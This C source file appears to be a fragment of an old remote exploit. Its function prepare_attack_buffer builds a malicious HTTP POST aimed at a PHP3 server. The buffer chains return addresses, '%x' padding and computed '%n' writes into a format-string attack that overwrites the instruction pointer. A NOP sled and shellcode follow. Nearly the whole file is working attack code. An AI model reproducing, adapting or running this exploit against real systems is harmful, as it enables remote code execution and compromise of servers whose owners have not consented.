
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct system_type {int shellcode_address; int shellcode_len; int already_written; scalar_t__ offset; int eip_address; } ;


 int BUF_LEN ;
 int NOP ;
 scalar_t__ PHP3_WARNING ;
 int bzero (char*,int) ;
 int calculate_precision (int,int ) ;
 int memset (char*,int ,int) ;
 char* shellcode ;
 int sprintf (char*,char*,...) ;
 int strcat (char*,char*) ;
 int strlen (char*) ;
 int strncat (char*,char*,int) ;

void
prepare_attack_buffer (char *attack_buffer, struct system_type *system,
        char *url)
{
 int dest_buffer_written;
 int ctr;
 char *address;
 char buf[25];

 int p1,p2,p3,p4;
 int nop_count;

 bzero (attack_buffer, 2000);
 sprintf (attack_buffer, "POST http://%s HTTP/1.0\nConnection: close\nUser-Agent: tirpitz\nContent-Type: multipart/form-data   ", url);

 dest_buffer_written = strlen (attack_buffer);

 strcat (attack_buffer, "\x11\x11\x11\x11");
 address = (char *)&system->eip_address;
 strncat (attack_buffer, address, 4);
 strcat (attack_buffer, "\x11\x11\x11\x11");
 system->eip_address++;
 address = (char *)&system->eip_address;
 strncat (attack_buffer, address, 4);
 strcat (attack_buffer, "\x11\x11\x11\x11");
 system->eip_address++;
 address = (char *)&system->eip_address;
 strncat (attack_buffer, address, 4);
 strcat (attack_buffer, "\x11\x11\x11\x11");
 system->eip_address++;
 address = (char *)&system->eip_address;
 strncat (attack_buffer, address, 4);





 for (; system->offset; system->offset--)
  strcat (attack_buffer, "%x ");

 p1 = calculate_precision ((system->shellcode_address & 0x000000ff), system->already_written);
 p2 = calculate_precision ((system->shellcode_address & 0x0000ff00) >> 8, system->already_written);
 p3 = calculate_precision ((system->shellcode_address & 0x00ff0000) >> 16, system->already_written);
 p4 = calculate_precision ((system->shellcode_address & 0xff000000) >> 24, system->already_written);
 sprintf (buf, "%%%dd%%n%%%dd%%n%%%dd%%n%%%dd%%n", p1, p2, p3, p4);
 strcat (attack_buffer, buf);

 ctr = strlen (attack_buffer);
 dest_buffer_written = ctr - dest_buffer_written;
 dest_buffer_written += PHP3_WARNING;
 attack_buffer += ctr;
 nop_count = BUF_LEN - dest_buffer_written - system->shellcode_len;
 memset (attack_buffer, NOP, nop_count);



 attack_buffer += nop_count;
 strcat (attack_buffer, shellcode);
 strcat (attack_buffer, "\n");
 strcat (attack_buffer, "Content-Length: 1337\n\n");
}
